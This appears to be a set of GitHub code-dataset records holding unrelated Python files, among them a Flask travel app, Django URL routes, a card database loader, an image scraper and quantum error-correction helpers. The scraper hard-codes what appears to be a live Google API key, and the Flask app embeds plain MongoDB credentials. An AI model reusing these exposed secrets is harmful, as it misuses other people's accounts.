in range(times):\n# final_Z+=zz[k]\n#nowTime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n#fn='lesmis.mat'\n#scipy.io.savemat(fn,{'a':a,'b':b,'r':chain_Rho,'alpha':chain_alpha,'Z':chain_Z,'net':chain_graphs})\n#final_Z=(final_Z>0).astype(int)\n#final_rho=final_rho/times\n#Z=chain_Z[-1]\n#[times,kmax,zz,a_f,kkk]=summary_K(chain_K)\n#Z_result=tune_Z(Z_result)\n#print(\"Finally: most K_plus is\", kkk,\"occur times: \",times, \"alpha is\", a_result)\n#print(\"Z is\",Z_result) \n#print(\"K_plus is\", np.shape(Z_result)[1])\nc13=c1()-1\nc23=c2()-1\nc33=c3()-1 \nfile.write('=== '+str(c13)+' '+str(c23)+' '+str(c33)+' '+str(c13+c23+c33)+\" \\n\")\nfile.close() \nplotk(chain_ks)\nplotl(chain_Rho)\n\n#dill.dump_session('yuseed.pkl')\nseed=[4978,4988,4990]\n#write_mat(seed)\ncc=chain_alpha\n\nplot_post2(cc, alpha=0.05, show_mode=True, kde_plot=True, bins=4, \n ROPE=[min(cc),max(cc)], comp_val=np.median(cc), roundto=2)\n#ccc=chain_Rho\n#\n#plot_post1(ccc, alpha=0.05, show_mode=True, kde_plot=True, bins=4, \n# ROPE=[min(ccc),max(ccc)], comp_val=np.median(ccc), roundto=2)\n#plota(chain_alpha)","repo_name":"yucomputer2018/rILFM","sub_path":"myibp-uncollapsed-lesmis.py","file_name":"myibp-uncollapsed-lesmis.py","file_ext":"py","file_size_in_byte":29503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17414504265","text":"from hwt.doc_markers import internal\nfrom hwt.hdl.types.defs import INT, SLICE\nfrom hwt.hdl.types.slice import HSlice\nfrom hwt.hdl.types.typeCast import toHVal\n\n\n@internal\ndef slice_to_SLICE(sliceVals, width):\n \"\"\"convert python slice to value of SLICE hdl type\"\"\"\n if sliceVals.step is None:\n step = -1\n else:\n step = sliceVals.step\n\n start = sliceVals.start\n if start is None:\n start = INT.from_py(width)\n else:\n start = toHVal(start)\n\n stop = sliceVals.stop\n if stop is None:\n stop = INT.from_py(0)\n else:\n stop = toHVal(stop)\n\n v = slice(start, stop, step)\n return HSlice.getValueCls()(SLICE, v, 1)\n","repo_name":"Nic30/hwt","sub_path":"hwt/hdl/types/sliceUtils.py","file_name":"sliceUtils.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"48"} +{"seq_id":"13235150861","text":"# classwork\ndef grades():\n num = 0\n grade = 0\n\n holder = input(\"Enter Grade: \")\n while(holder != \"done\"):\n num += 1\n grade += int(holder)\n holder = input(\"Enter Grade: \")\n\n return grade / num\n\ndef squares():\n ans = []\n holder = []\n for i in range(1, 31):\n holder += [i]\n\n for i in holder[:6]:\n ans += [i ** 2]\n for i in holder[25:]:\n ans += [i ** 2]\n\n for i in ans:\n print(i)\n\ndef duplicate(l):\n ans = []\n for i in l:\n if ans.count(i) == 0:\n ans += [i]\n return ans\n\n# homework\ndef even(l):\n ans = []\n for i in l:\n if i % 2 == 0:\n ans += [i]\n return ans\n\n# challenge\ndef circle(l1, l2):\n dup = []\n if len(l1) > len(l2):\n holder = l1\n l1 = l2\n l2 = holder\n\n for i in range(len(l2)):\n if l1[0] == l2[i]:\n dup += [i]\n\n holder = []\n\n for i in dup:\n holder += [l2[i:] + l2[:i]]\n\n l1 = (l1 * (int(len(l2) / len(l1)))) + l1[:len(l2) % len(l1)]\n\n ans = False\n\n for i in holder:\n if i == l1:\n return True\n\n return False\n","repo_name":"aaaronhsu/MKS22QA","sub_path":"Unit 2 - Strings and Lists/3_9listsAgain.py","file_name":"3_9listsAgain.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1036875046","text":"from django.urls import path\n\nfrom jedzonko.views import IndexView, RecipeListView, DashboardView, RecipeCreateView, PlanListView, PlanCreateView, \\\n ReceipeDetailView, PlanDetailView, SchedulesMealCreateView, IngredientsCreateView, IngredientsListView, \\\n RecipeUpdate, PlanUpdate, IngredientUpdate, RecipeDeleteView, PlanDeleteView, SchedulesMealCDelete\n\nurlpatterns = [\n path('', IndexView.as_view(), name='home'),\n path('recipe/list', RecipeListView.as_view(), name='recipe_list'),\n path('main', DashboardView.as_view(), name='dashbord'),\n path('recipe/add/', RecipeCreateView.as_view(), name='add_recipe'),\n path('plan/list', PlanListView.as_view(), name='plan_list'),\n path('plan/add/', PlanCreateView.as_view(), name='add_plan'),\n path('recipe//', ReceipeDetailView.as_view(), name='recipe_details'),\n path('plan//', PlanDetailView.as_view(), name='plan_details'),\n path('plan/add-recipe/', SchedulesMealCreateView.as_view(), name='add-plan-recipe'),\n path('ingredient/add/', IngredientsCreateView.as_view(), name='add_ingredient'),\n path('ingredient/', IngredientsListView.as_view(), name='ingredient'),\n path('recipe/modify//', RecipeUpdate.as_view(), name='update_recipe'),\n path('plan/modify//', PlanUpdate.as_view(), name='update_plan'),\n path('ingredient/modify//', IngredientUpdate.as_view(), name='update_ingredient'),\n path('recipe/del//', RecipeDeleteView.as_view(), name='delete_recipe'),\n path('plan/del//', PlanDeleteView.as_view(), name='delete_plan'),\n path('plan_recipe/del//', SchedulesMealCDelete.as_view(), name='delete_schedules'),\n\n\n]\n\n","repo_name":"Jacek960/Recipe-book","sub_path":"jedzonko/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74003706385","text":"from flask import Flask, render_template, jsonify, request\nfrom pymongo import MongoClient\nfrom datetime import datetime, timedelta as t\nfrom functions import schedule, parsing, recommend\n\n\napp = Flask(__name__)\n\nclient = MongoClient('mongodb://test:test@localhost', 27017)\n# client = MongoClient('localhost', 27017)\ndb = client.dbhomework\n\n\n## HTML 화면 보여주기\n@app.route('/')\ndef homework():\n return render_template('index.html')\n\n\n# 저장하기(POST) API\n@app.route('/add', methods=['POST'])\ndef add_place():\n word = request.form['word']\n places_info = []\n parsing.parsing(0, word, places_info)\n\n address = places_info[0]['address']\n name = places_info[0]['name']\n place_info = {\n 'name': name,\n 'address': address,\n 'word': word\n }\n\n return jsonify({'place_info': place_info, 'msg': '저장 완료'})\n\n# 경로 추천하기 API\n@app.route('/recommend', methods=['POST'])\ndef recommend_():\n\n places = []\n for _, value in request.form.items():\n places.append(value)\n\n start_day = datetime(2022, 4, 14, 0, 0, 0)\n start_time = start_day + t(hours=10)\n add_place_index = [1, 1, 1, 1]\n\n # 여행 장소들의 정보를 담은 리스트\n places_info = []\n dists, route = recommend.dists_and_route(places, places_info)\n total_route = schedule.schedule(places, places_info, start_day, start_time, dists, route, add_place_index)\n\n return jsonify({'total_route': total_route, 'msg': '추천 완료'})\n\n\n# 주문 목록보기(Read) API\n@app.route('/show', methods=['GET'])\ndef view_orders():\n\n orders = list(db.orders2.find({}, {'_id': False}))\n\n return jsonify({'orders': orders,'msg': '주문 조회 완료'})\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)","repo_name":"kimphysicsman/Travel_recommedation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33422180623","text":"import pygame\nfrom pygame.locals import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\n\nclass Scene:\n\n def __init__(self, window_size=[500, 500]):\n self.window = pygame.display.set_mode(\n window_size, HWSURFACE | OPENGL | DOUBLEBUF\n )\n glViewport(0, 0, window_size[0], window_size[1])\n glShadeModel(GL_SMOOTH)\n glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)\n viewport = glGetIntegerv(GL_VIEWPORT)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(\n 60.0,\n float(viewport[2]) / float(viewport[3]),\n 0.1,\n 1000.0\n )\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n def Get_Window(self):\n return self.window\n\n\ndef init():\n global scene\n scene = Scene()\n\n\ndef Get():\n try:\n return scene\n except:\n init()\n return scene\n\n\ndef Draw(points):\n for p in points:\n glClear(GL_COLOR_BUFFER_BIT)\n glBegin(GL_POINTS)\n glVertex2i(int(p[0]), int(p[1]), int(p[2]))\n glEnd()\n","repo_name":"Izzette/rmd","sub_path":"scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71824830226","text":"# Jogo: Adivinje o número\nimport random\nimport time\n\nprint('='*10,'Adivinhação','='*10)\nn = random.randint(0,5)\njog = int(input('\\nTente adivinhar em qual número estou pensando (de 0 a 5): '))\n\nprint('...')\ntime.sleep(2)\n\nif jog == n:\n print(f'\\033[1;32mParabéns!!! \\nVocê venceu, o número certo era o número \\033[0;34m{n}.')\n\nelse:\n print(f'\\033[1;31mVocê perdeu. \\nO número certo era o numéro \\033[0;34m{n}.')\n\n'''Cores no Terminal\nStyle (Estilo das letras) Text (Cores do Texto) / Back (Cores de Fundo\n\n0 - Padrão do Terminal Branco - 30 40\n1 - Negrito Vermelho - 31 41\n4 - Sublinhado Verde - 32 42\n7 - Inversão das cores do Texto e Amarelo - 33 43\n Fundo Azul - 34 44\n Magenta - 35 45\n Ciano - 36 46\n Cinza -37 47'''","repo_name":"gabrielcosmo/cursoemvideo.curso.python3","sub_path":"Mundo1/exe028.py","file_name":"exe028.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23926687608","text":"import json\nimport math\nimport os\nimport time\nfrom . import build\n\nDB_PATH = \"data/carddb/db.json\"\n\n\ndef isDBStale(db):\n creationTime = db[\"creation_time\"]\n now = math.floor(time.time())\n\n oneWeek = 60*60*24*7\n\n return abs(creationTime - now) > oneWeek\n\n\ndef readDb():\n with open(DB_PATH, \"r\") as f:\n return json.load(f)\n\n\nclass CardDB:\n def noneCard(self, id=-1, name=\"None\"):\n return {\n \"id\": id,\n \"name\": name,\n \"date\": \"0000-01-01\",\n \"unofficial_versions\": [],\n \"types\": [],\n \"alt_names\": [],\n }\n\n def getCardById(self, id):\n if id not in self.idMap:\n print(\"No card for id\", id)\n return self.noneCard(id=id), False\n\n return self.idMap[id], True\n\n def getCardByName(self, name):\n key = name.lower()\n\n if key not in self.nameMap:\n print(\"No card for name\", name)\n return self.noneCard(name=name), False\n\n return self.nameMap[key], True\n\n def idToName(self, id):\n card, ok = self.getCardById(id)\n return card[\"name\"], ok\n\n def nameToId(self, name):\n card, ok = self.getCardByName(name)\n return card[\"id\"], ok\n\n def filter(self, filterFunc):\n hits = filter(filterFunc, self.cards)\n return list(hits)\n\n def __init__(self):\n fileExists = os.path.isfile(DB_PATH)\n if not fileExists:\n build.buildDatabase()\n\n db = readDb()\n\n if isDBStale(db):\n build.buildDatabase()\n db = readDb()\n\n cards = db[\"cards\"]\n nameMap = dict()\n idMap = dict()\n\n for card in cards:\n idMap[card[\"id\"]] = card\n\n key = card[\"name\"].lower()\n nameMap[key] = card\n for altname in card[\"alt_names\"]:\n key = altname.lower()\n nameMap[key] = card\n\n self.cards = cards\n self.idMap = idMap\n self.nameMap = nameMap\n\n\nif __name__ == \"__main__\":\n db = CardDB()\n card = db.getCardByName(\"Kinetic Soldier\")\n print(card)\n card = db.getCardByName(\"Cipher Soldier\")\n print(card)\n","repo_name":"Larikk/ygo-jj-helper","sub_path":"jjpy/carddb/carddb.py","file_name":"carddb.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14128559039","text":"import json\nimport re\nfrom googleapiclient.discovery import build\nimport pprint\nimport glob\nimport urllib.request\n\ndef get_image_uri(keyword,num_images):\n service = build(\"customsearch\",\"v1\",developerKey=\"AIzaSyDBZGKQSQmesq3MlSMuI-spfjOJaHmCHNM\")\n start_index = 1\n uri_list = []\n try:\n for i in range(int(num_images//10)):\n res = service.cse().list(\n q=keyword,\n cx=\"a7f092859a5b4aaf5\",\n num=10,\n searchType=\"image\",\n start=start_index\n ).execute()\n start_index += 10\n\n for image in res['items']:\n uri_list += [image['link']]\n except Exception as e:\n print(e)\n exit(-1)\n return uri_list\n\ndef get_next_file_name_cnt():\n files = glob.glob(\"./saved_images/*\")\n if len(files) == 0:\n return 1\n return max([int(re.split(\"[/|\\\\\\]\",path)[-1].split(\".\")[0]) for path in files]) +1\n\ndef save_images(uri_list):\n file_name_cnt = get_next_file_name_cnt()\n for uri in uri_list:\n path = f\"./saved_images/{file_name_cnt}.png\"\n try:\n img = urllib.request.urlopen(uri).read()\n with open(path,\"wb\") as f:\n f.write(img)\n file_name_cnt += 1\n except Exception as e:\n print(e)\n\ndef main():\n keyword = \"高校野球 中継\"\n num_images = 20\n \n image_uri_list = get_image_uri(keyword,num_images)\n save_images(image_uri_list)\n\nif __name__ == '__main__':\n main()","repo_name":"pikohan-suzuki/draw-the-strike-zone-rect","sub_path":"save_searched_images.py","file_name":"save_searched_images.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40718388588","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\nfrom .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\n@dataclass\nclass SequentialActivationRenewalsAlertIncident(UnifiedRoleManagementAlertIncident):\n # The OdataType property\n odata_type: Optional[str] = \"#microsoft.graph.sequentialActivationRenewalsAlertIncident\"\n # The length of sequential activation of the same role.\n activation_count: Optional[int] = None\n # Display name of the subject that the incident applies to.\n assignee_display_name: Optional[str] = None\n # The identifier of the subject that the incident applies to.\n assignee_id: Optional[str] = None\n # User principal name of the subject that the incident applies to. Applies to user principals.\n assignee_user_principal_name: Optional[str] = None\n # The identifier for the directory role definition that's in scope of this incident.\n role_definition_id: Optional[str] = None\n # The display name for the directory role.\n role_display_name: Optional[str] = None\n # The globally unique identifier for the directory role.\n role_template_id: Optional[str] = None\n # End date time of the sequential activation event.\n sequence_end_date_time: Optional[datetime.datetime] = None\n # Start date time of the sequential activation event.\n sequence_start_date_time: Optional[datetime.datetime] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> SequentialActivationRenewalsAlertIncident:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: SequentialActivationRenewalsAlertIncident\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return SequentialActivationRenewalsAlertIncident()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\n from .unified_role_management_alert_incident import UnifiedRoleManagementAlertIncident\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"activationCount\": lambda n : setattr(self, 'activation_count', n.get_int_value()),\n \"assigneeDisplayName\": lambda n : setattr(self, 'assignee_display_name', n.get_str_value()),\n \"assigneeId\": lambda n : setattr(self, 'assignee_id', n.get_str_value()),\n \"assigneeUserPrincipalName\": lambda n : setattr(self, 'assignee_user_principal_name', n.get_str_value()),\n \"roleDefinitionId\": lambda n : setattr(self, 'role_definition_id', n.get_str_value()),\n \"roleDisplayName\": lambda n : setattr(self, 'role_display_name', n.get_str_value()),\n \"roleTemplateId\": lambda n : setattr(self, 'role_template_id', n.get_str_value()),\n \"sequenceEndDateTime\": lambda n : setattr(self, 'sequence_end_date_time', n.get_datetime_value()),\n \"sequenceStartDateTime\": lambda n : setattr(self, 'sequence_start_date_time', n.get_datetime_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n super().serialize(writer)\n writer.write_int_value(\"activationCount\", self.activation_count)\n writer.write_str_value(\"assigneeDisplayName\", self.assignee_display_name)\n writer.write_str_value(\"assigneeId\", self.assignee_id)\n writer.write_str_value(\"assigneeUserPrincipalName\", self.assignee_user_principal_name)\n writer.write_str_value(\"roleDefinitionId\", self.role_definition_id)\n writer.write_str_value(\"roleDisplayName\", self.role_display_name)\n writer.write_str_value(\"roleTemplateId\", self.role_template_id)\n writer.write_datetime_value(\"sequenceEndDateTime\", self.sequence_end_date_time)\n writer.write_datetime_value(\"sequenceStartDateTime\", self.sequence_start_date_time)\n \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/sequential_activation_renewals_alert_incident.py","file_name":"sequential_activation_renewals_alert_incident.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"37147803719","text":"# ROT13 is a simple letter substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet. ROT13 is an example of the Caesar cipher.\n# Create a function that takes a string and returns the string ciphered with Rot13. \n# If there are numbers or special characters included in the string, they should be returned as they are. \n# Only letters from the latin/english alphabet should be shifted, like in the original Rot13 \"implementation\".\n# Please note that using encode is considered cheating.\n\nimport string\n\ndef rot13(message):\n response = ''\n for letter in message:\n if letter.isalpha():\n if letter.islower():\n index = string.ascii_lowercase.index(letter) + 13\n response += string.ascii_lowercase[index]\n else:\n index = string.ascii_uppercase.index(letter) + 13\n response += string.ascii_uppercase[index] \n else:\n response += letter\n return response\n\nmessage = 'This is a test script.'\n\nprint(rot13(message))","repo_name":"etesor/katas","sub_path":"python/rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3198712380","text":"# PX409-USBH script\r\n# written by Jheng-Han Tsai, March 2019\r\n#####################################################################\r\nimport serial\r\nimport time\r\nimport sys\r\nimport struct\r\nimport numpy as np\r\n\r\nclass PX409():\r\n '''Driver for the PX409 pressure transducer'''\r\n def __init__(self, port):\r\n self.serial = serial.Serial(\r\n port=port,\r\n baudrate=115200,\r\n timeout=1,\r\n parity=serial.PARITY_NONE,\r\n bytesize=serial.EIGHTBITS,\r\n stopbits=serial.STOPBITS_ONE,\r\n )\r\n def __enter__(self):\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_value, traceback):\r\n # The exit code of the sample application.\r\n exitCode = 0\r\n sys.exit(exitCode)\r\n print ('Transducer closed.')\r\n\r\n def write(self, command):\r\n self.serial.write((command + '\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n return resp_unicode\r\n\r\n def get_serialNumber(self):\r\n '''Returns the transducer’s serial number.\r\n '''\r\n return self.write('SNR')\r\n \r\n def get_firmware(self):\r\n '''Returns the transducer’s Unit ID, firmware version, range, and\r\n engineering units, all in ASCII.\r\n '''\r\n return self.write('ENQ')\r\n\r\n def set_iirFilter(self, num):\r\n '''Read/Write. Reads or sets the IIR filter period (time constant).\r\n where optional nnn is 0 or 1 (disabled), or between 2 to 255\r\n '''\r\n self.serial.write(('IFILTER '+str(num)+'\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n return resp_unicode\r\n\r\n def set_averageNumber(self, num):\r\n '''Reads or sets the number of data points to be averaged for the\r\n boxcar average filter. Valid values are 0, 2, 4, 8 and 16. Note: the output rate is\r\n determined by the RATE command setting divided by this value (excluding 0). AVG x\r\n sets the averaged number. Note: the boxcar changes the rate of the readings returned by\r\n the PC command. This is because the boxcar averages the specified number of readings\r\n given by nn, and outputs one reading for the group.\r\n '''\r\n self.serial.write(('AVG '+str(num)+'\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n return resp_unicode\r\n\r\n def set_rate(self, num):\r\n '''Reads or sets the transducer update rate. Valid Values are 0=5sps,\r\n 1=10sps, 2=20sps, 3=40sps, 4=80sps, 5=160sps, 6=320sps, 7=640sps, 8=1000sps.\r\n '''\r\n self.serial.write(('RATE '+str(num)+'\\r').encode('ascii'))\r\n time.sleep(0.5)\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n return resp_unicode\r\n\r\n def pickAscii(self):\r\n '''Sends single ASCII reading (decimal point also sent as ASCII). Data is post filter, and\r\n scaled to the native engineering units and type of transducer.\r\n '''\r\n self.serial.write(('P' + '\\r\\n').encode('ascii'))\r\n time.sleep(0.025) #Based on reading rate, the highest transfer rate is about 50 Hz\r\n waiting = self.serial.inWaiting()\r\n resp = self.serial.read(waiting)\r\n resp_unicode = resp.decode('ascii')\r\n \r\n varList = resp_unicode.split()\r\n var = float(varList[0]) #Unit: hPa(default) \r\n \r\n return var\r\n \r\n\r\n def pickBinary(self):\r\n '''Sends single Binary reading.\r\n '''\r\n self.serial.write(('B' + '\\r\\n').encode('ascii'))\r\n time.sleep(0.025) #Based on reading rate\r\n waiting = self.serial.inWaiting()\r\n packet = self.serial.read(waiting)\r\n print (packet)\r\n print ([hex(x) for x in bytes(packet)])\r\n\r\n bipacket = bytearray(bytes(packet)[2:]) \r\n var, = struct.unpack('= dataLength-1:\r\n break\r\n else:\r\n bb.append(bytes(data)[startidx+j])\r\n if hex(bytes(data)[startidx+j]) == '0xaa': \r\n startidx = startidx+1\r\n else:\r\n startidx = startidx\r\n j += 1\r\n break\r\n \r\n if startidx+j >= dataLength-1:\r\n var = 0\r\n \r\n else:\r\n bipacket = bytearray(bytes(bb)[:]) \r\n var, = struct.unpack(' 0:\n return clip_grad.clip_grad_norm_(params, **grad_clip)\n\n\ndef update_lr(optimizer, lr):\n print('Drop LR to', lr)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef save_model(model, optimizer, epochs, loss_train, loss_cls_train,\n loss_pts_init_train, loss_pts_refine_train, loss_heatmap_train,\n loss_offset_train, loss_sem_train, loss_val, loss_cls_val,\n loss_pts_init_val, loss_pts_refine_val, loss_heatmap_val,\n loss_offset_val, loss_sem_val, opts):\n model_name = \"CenterNet_pp_{}_{}.pth\".format(opts[\"backbone\"], epochs)\n torch.save(\n {\n 'epoch': epochs,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'train_loss_history': loss_train,\n 'train_loss_history_cls': loss_cls_train,\n 'train_loss_history_pts_init': loss_pts_init_train,\n 'train_loss_history_pts_refine': loss_pts_refine_train,\n 'train_loss_history_heatmap': loss_heatmap_train,\n 'train_loss_history_offset': loss_offset_train,\n 'train_loss_history_sem': loss_sem_train,\n 'val_loss_history': loss_val,\n 'val_loss_history_cls': loss_cls_val,\n 'val_loss_history_pts_init': loss_pts_init_val,\n 'val_loss_history_pts_refine': loss_pts_refine_val,\n 'val_loss_history_heatmap': loss_heatmap_val,\n 'val_loss_history_offset': loss_offset_val,\n 'val_loss_history_sem': loss_sem_val\n }, model_name)\n","repo_name":"qwertyman30/CenterNet-keypoint-triplets","sub_path":"model/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21480178400","text":"import numpy as np\nimport random\nfrom tabulate import tabulate\nimport matplotlib.pyplot as plt\n\ndef sigmaz():\n return np.array([[1,0], [0, -1]])\n\ndef sigmax():\n return np.array([[0,1], [1,0]])\n\ndef sigmay():\n return np.array([[0,-1], [1,0]])\n\n#conjugate transpose\ndef ct(matrix):\n return matrix.conj().T\n\n\ndef next(previous, gate):\n return gate@previous@ct(gate)\n\n#tensor\ndef tensor(ops):\n answer = ops[0]\n for op in ops[1:]:\n answer = np.kron(answer, op)\n return answer\n\n\n\n\nzero = np.array([[1], [0]])\none = np.array([[0], [1]])\n\ndef cnot(control, target, n):\n for i in range(n):\n if i == control:\n sub_g = zero@ct(zero)\n sub_e = one@ct(one)\n elif i == target:\n sub_g = np.eye(2)\n sub_e = sigmax()\n else:\n sub_g = np.eye(2)\n sub_e = np.eye(2)\n g_term = sub_g if i == 0 else np.kron(g_term, sub_g)\n e_term = sub_e if i == 0 else np.kron(e_term,sub_e)\n \n return g_term + e_term\n \n\n#applies cnot \ndef apply_cnot(string, control, target):\n if control == target:\n return string\n newstring = ''\n if string[control] == '1':\n if string[target] == '1':\n newstring = string[:target]+'0'+string[target+1:]\n else:\n newstring= string[:target]+'1'+string[target+1:]\n else:\n newstring = string\n return newstring\n\ndef apply_x(string, target):\n if string[target] == '1':\n string = string[:target] + '0' + string[target+1:]\n elif string[target] == '0':\n string = string[:target] + '1' + string[target+1:]\n return string\n \n\n\ndef returnarray(list):\n newlist = []\n for l in list:\n if l[0] == \"0\":\n final = zero\n else:\n final = one\n for x in range(len(l) -1):\n if l[x+1] == \"0\":\n final = np.kron(final, zero)\n else:\n final = np.kron(final, one)\n newlist.append(final)\n return newlist\n\n\n\n#random circuit\n\ndef gen_random_encoding(n,num_gates):\n number = num_gates\n finallist =[]\n while number > 0:\n if random.randrange(0, 2, 1) == 0:\n finallist.append(('X', (random.randrange(0,n,1),)))\n else:\n first = random.randrange(0, n, 1)\n second = random.randrange(0, n, 1)\n while first == second:\n second = random.randrange(0, n, 1)\n finallist.append(('CX',(first,second)))\n number -= 1\n return finallist\n \ndef evolve_stabilizers(stabilizers, gates, logicals):\n stabilizerlist = []\n logicallist = []\n for stabilizer in stabilizers:\n for gate in gates:\n stabilizer = evolve(stabilizer, gate)\n stabilizerlist.append(stabilizer)\n for logical in logicals:\n for gate in gates:\n logical = evolve(logical, gate)\n logicallist.append(logical)\n return (stabilizerlist,logicallist)\n\n\n\ndef evolve_operators(operators, gates):\n operatorlist = []\n for operator in operators:\n for gate in gates:\n operator = evolve(operator, gate)\n operatorlist.append(operator)\n return operatorlist\n\n\n\ndef evolve(input, gate):\n if gate[0] == 'CX':\n if input[gate[1][0]] == 'I' and input[gate[1][1]] == 'I':\n #II --> II\n return input\n \n elif input[gate[1][0]] == 'Z' and input[gate[1][1]] == 'I':\n #ZI --> ZI\n return input\n \n elif input[gate[1][0]] == 'I' and input[gate[1][1]] == 'Z':\n #IZ --> ZZ\n input = replace_char(input, gate[1][0], 'Z')\n return input\n \n elif input[gate[1][0]] == 'Z' and input[gate[1][1]] == 'Z':\n #ZZ-->IZ\n input = replace_char(input, gate[1][0], 'I')\n return input\n elif input[gate[1][0]] == 'X' and input[gate[1][1]] == 'I':\n #XI --> XX\n input = replace_char(input, gate[1][1], 'X')\n return input\n elif input[gate[1][0]] == 'I' and input[gate[1][1]] == 'X':\n #IX --> IX\n return input\n elif input[gate[1][0]] == 'X' and input[gate[1][1]] == 'X':\n #XX --> XI\n input = replace_char(input, gate[1][1], 'I')\n return input\n elif input[gate[1][0]] == 'X' and input[gate[1][1]] == 'Z':\n raise NotImplementedError(\"action of CX on XZ is not implemented\")\n elif input[gate[1][0]] == 'Z' and input[gate[1][1]] == 'X':\n raise NotImplementedError(\"action of CX on ZX is not implemented\")\n \n elif gate[0] == 'X':\n if input[gate[1][0]] == 'I':\n return input\n elif input[gate[1][0]] == 'Z':\n return input[:-1] + flip_sign(input[-1])\n elif input[gate[1][0]] == 'X':\n return input\n print(\"hi\")\n \n\ndef flip_sign(stab_sign):\n if stab_sign == '+':\n return '-' \n elif stab_sign == '-':\n return '+'\n else:\n raise ValueError(\"sign must be + or -\") \n\n\n\ndef replace_char(stab, i, new_char):\n return stab[:i] + new_char +stab[i+1:]\n\n\n\n\ndef construct_error(p,n):\n error = np.eye(2)\n for i in range(n):\n if random.randrange(1,100)/100 < p:\n if i == 0:\n error *= sigmax()\n else:\n error = tensor([error,sigmax()])\n else:\n if i != 0:\n error = tensor([error,np.eye(2)])\n return error\n\n\n#decoding.ipynb\ndef construct_list_errors(n, m):\n finallist = []\n\n for i in range(n):\n if len(finallist) == 0:\n finallist.append('I')\n finallist.append('X')\n \n else:\n for j in range(len(finallist)):\n if number_of_errors(finallist[j]) highestprob:\n highestprob = rlist[r]\n highestr = r\n table.update({e:highestr})\n return table\n\ndef print_table(table):\n result = table.items()\n data = list(result)\n numpyArray = np.array(data)\n head = ['Error', 'Recovery']\n print(tabulate(numpyArray, headers=head, tablefmt=\"grid\"))\n\n\n\n#random code simulation\ndef find_codewords(initial,gates):\n result=[]\n for state in initial:\n for x in gates:\n if x[0] == 'X':\n state = apply_x(state,x[1][0])\n elif x[0] == 'CX':\n state = apply_cnot(state,x[1][0], x[1][1])\n result.append(state)\n return result \n\n\ndef measure_stabilizers(stabilizers, codeword):\n results = []\n for stab in stabilizers:\n result = 1\n for i in range(len(stab)-1):\n if 